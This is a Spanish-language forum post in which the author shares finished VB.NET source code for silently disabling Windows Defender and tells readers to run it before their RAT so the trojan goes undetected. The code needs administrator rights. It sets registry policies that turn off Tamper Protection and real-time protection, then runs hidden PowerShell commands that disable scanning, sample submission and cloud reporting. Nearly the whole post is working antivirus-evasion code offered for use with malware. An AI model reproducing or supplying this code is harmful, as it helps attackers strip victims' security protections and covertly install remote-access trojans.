HOLA!!!
Les paso este codigo recien terminado para deshabilitar Windows defender en tiempo de ejecucion.
Vieron que Windows defender es casi tan histerico como Avira, suele saltar por casi cualquier cosa, solo ejecuten este codigo antes que su RAT y se va a ejecutar sin problemas sin que WD moleste.
[El metodo deshabilita Windows defender y la distribucion de muestras sin mostrar ninguna notificacion ni reiniciar la pc todo instantaneo y bonito]
Imports System
Imports Microsoft.Win32
Imports System.Diagnostics
Imports System.Security.Principal
Namespace DeshabilitarWD
Class Programa
Private Shared Sub Main()
If Not New WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) Then Return
EditarRegistro("SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1")
EditarRegistro("SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1")
CheckDefender()
End Sub
Private Shared Sub CheckDefender()
Dim proc As Process = New Process With {
.StartInfo = New ProcessStartInfo With {
.FileName = "powershell",
.Arguments = "Get-MpPreference -verbose",
.UseShellExecute = False,
.RedirectStandardOutput = True,
.WindowStyle = ProcessWindowStyle.Hidden,
.CreateNoWindow = True
}
}
proc.Start()
While Not proc.StandardOutput.EndOfStream
Dim line As String = proc.StandardOutput.ReadLine()
If line.Contains("DisableRealtimeMonitoring") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableRealtimeMonitoring $true")
ElseIf line.Contains("DisableBehaviorMonitoring") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableBehaviorMonitoring $true")
ElseIf line.Contains("DisableBlockAtFirstSeen") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableBlockAtFirstSeen $true")
ElseIf line.Contains("DisableIOAVProtection") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableIOAVProtection $true")
ElseIf line.Contains("DisablePrivacyMode") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisablePrivacyMode $true")
ElseIf line.Contains("SignatureDisableUpdateOnStartupWithoutEngine") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true")
ElseIf line.Contains("DisableArchiveScanning") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableArchiveScanning $true")
ElseIf line.Contains("DisableIntrusionPreventionSystem") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableIntrusionPreventionSystem $true")
ElseIf line.Contains("DisableScriptScanning") AndAlso line.Contains("False") Then
Pwrshll("Set-MpPreference -DisableScriptScanning $true")
ElseIf line.Contains("SubmitSamplesConsent") AndAlso Not line.Contains("2") Then
Pwrshll("Set-MpPreference -SubmitSamplesConsent 2")
ElseIf line.Contains("MAPSReporting") AndAlso Not line.Contains("0") Then
Pwrshll("Set-MpPreference -MAPSReporting 0")
ElseIf line.Contains("HighThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -HighThreatDefaultAction 6 -Force")
ElseIf line.Contains("ModerateThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -ModerateThreatDefaultAction 6")
ElseIf line.Contains("LowThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -LowThreatDefaultAction 6")
ElseIf line.Contains("SevereThreatDefaultAction") AndAlso Not line.Contains("6") Then
Pwrshll("Set-MpPreference -SevereThreatDefaultAction 6")
End If
End While
End Sub
Private Shared Sub Pwrshll(ByVal args As String)
Dim proc As Process = New Process With {
.StartInfo = New ProcessStartInfo With {
.FileName = "powershell",
.Arguments = args,
.WindowStyle = ProcessWindowStyle.Hidden,
.CreateNoWindow = True
}
}
proc.Start()
End Sub
Private Shared Sub EditarRegistro(ByVal regPath As String, ByVal name As String, ByVal value As String)
Try
Using key As RegistryKey = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree)
If key Is Nothing Then
Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord)
Return
End If
If key.GetValue(name) <> CObj(value) Then key.SetValue(name, value, RegistryValueKind.DWord)
End Using
Catch
End Try
End Sub
End Class
End Namespace
GRACIAS POR LEER!!!